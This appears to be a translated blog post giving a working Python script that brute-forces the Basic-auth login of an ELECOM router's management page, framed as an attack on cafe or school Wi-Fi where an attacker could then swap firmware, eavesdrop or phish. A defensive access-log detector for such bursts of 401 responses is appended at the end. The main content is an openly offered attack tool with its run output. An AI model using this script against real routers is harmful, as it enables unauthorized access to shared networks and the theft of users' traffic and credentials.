[PYTHON] Brute force attack on router management page

Background

Wi-Fi networks offered by schools and cafes often leave the router's management page reachable at 192.168.X.1 from any client device. A password is required, of course, but a brute-force attack may recover it. Once inside the management screen, an attacker can replace the firmware and do anything from packet eavesdropping to phishing. The SNS password you typed at the cafe you visited yesterday may already be circulating on the darknet ...

Overview

This time, I run a brute-force attack against the Basic authentication on the management screen of an ELECOM router and try to identify the password.

Environment

Confirmation before attack

Suppose a privately run cafe offers a home Wi-Fi router as its access point. Visitors join the Wi-Fi using the password written on the menu. Of course, an attacker can join it too. The attacker first checks their own IP with the following command.


waru@waru-PC:~$ ifconfig
wlo1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.2.100  netmask 255.255.255.0  broadcast 192.168.2.255

My IP is 192.168.2.100. This means the router's management page must be at "http://192.168.2.1", because most routers place their administration page at the .1 host address of the subnet. Opening it in a browser showed the following.

[Screenshot: the management page's login prompt]

At this point you may already get in by typing [user: admin, pass: admin], but that did not work here. So the following code comes into play.

Code

The script fixes the user to admin, generates candidate passwords from lowercase letters in sequence with increasing length, and tries to log in with each user/password pair.

router_admin_brute_force.py


import requests
import string

target_ip = 'http://192.168.2.1/'

def access(user: str, password: str):
    """Try one Basic-auth login; raise ConnectionError if the router rejects it."""
    response = requests.get(target_ip, auth=(user, password))
    if response.status_code == 401:
        raise ConnectionError
    # a rejected login can also come back as a 200 page containing "please try"
    if "please try" in response.text:
        raise ConnectionError

# Index 0 is a placeholder zero digit so that 1 -> "a", 26 -> "z", 28 -> "aa";
# candidates containing "0" (e.g. 27 -> "a0") are tried as well.
chars = ["0"] + list(string.ascii_lowercase)

# ref: https://stackoverflow.com/questions/2267362/how-to-convert-an-integer-in-any-base-to-a-string
def int2base(x, base):
    """Write the non-negative integer x in the given base using chars as digits."""
    digits = []
    while x:
        digits.append(chars[x % base])
        x //= base
    digits.reverse()
    return ''.join(digits)

i = 0
while True:
    i += 1
    password = int2base(i, len(chars))
    try:
        access(user="admin", password=password)
    except Exception:
        pass  # rejected (or a network error): move on to the next candidate
    else:
        print(f"success:{password}")
        break

Execution result


waru@waru-PC:~/Programs/router_hack$ python3 router_admin_brute_force.py 
success:zzz

The password zzz has been identified. Let's enter it at "http://192.168.2.1".

[Screenshot: logged in to the management screen]

I'm in. From here on, the attacker can do as they please ...

Consideration

This time I intentionally set the short password zzz on the router, yet identifying it with the above code still took 10 minutes. Moreover, since the search does not consider uppercase letters, digits or special characters, the execution time becomes enormous once those are combined. However, the above code may not be optimal, so it cannot yet be said that this attack is impractical in terms of time. Profiling the code may reveal improvements. That's all for this time.
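Seen from the router's side, the script above leaves an obvious trace: a burst of 401 responses for the same path from one client, one per request, within seconds. The following detector, an added example rather than code from the original post, runs that check over a few constructed access-log lines; the Common Log Format, the ten-per-minute threshold and the sample addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed log format: Common Log Format, as many embedded HTTP servers write it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S"

def parse_line(line: str):
    """Return (ip, timestamp, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts").split()[0], TS_FMT)  # drop the TZ offset
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))

def detect_basic_auth_bruteforce(lines, threshold=10, window_s=60):
    """Flag each client IP that produces >= threshold 401 responses within
    window_s seconds. Returns {ip: time at which the threshold was first reached}."""
    recent = defaultdict(deque)  # ip -> timestamps of its recent 401s
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, _path, status = parsed
        if status != 401:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:  # expire entries outside the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = ts
    return alerts

# Constructed sample: 12 rejected attempts from one client in 12 seconds,
# then one successful login from a different client.
SAMPLE_LOG = [
    f'192.168.2.100 - - [31/Dec/2019:01:20:{s:02d} +0900] "GET / HTTP/1.1" 401 0'
    for s in range(12)
] + ['192.168.2.50 - admin [31/Dec/2019:01:20:30 +0900] "GET / HTTP/1.1" 200 5120']

if __name__ == "__main__":
    for ip, when in detect_basic_auth_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force from {ip}, threshold reached at {when:%H:%M:%S}")
```

Where the router answers a wrong password with a 200 error page instead of 401, as the script's "please try" check anticipates, key the counter on that page's marker rather than on the status code.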
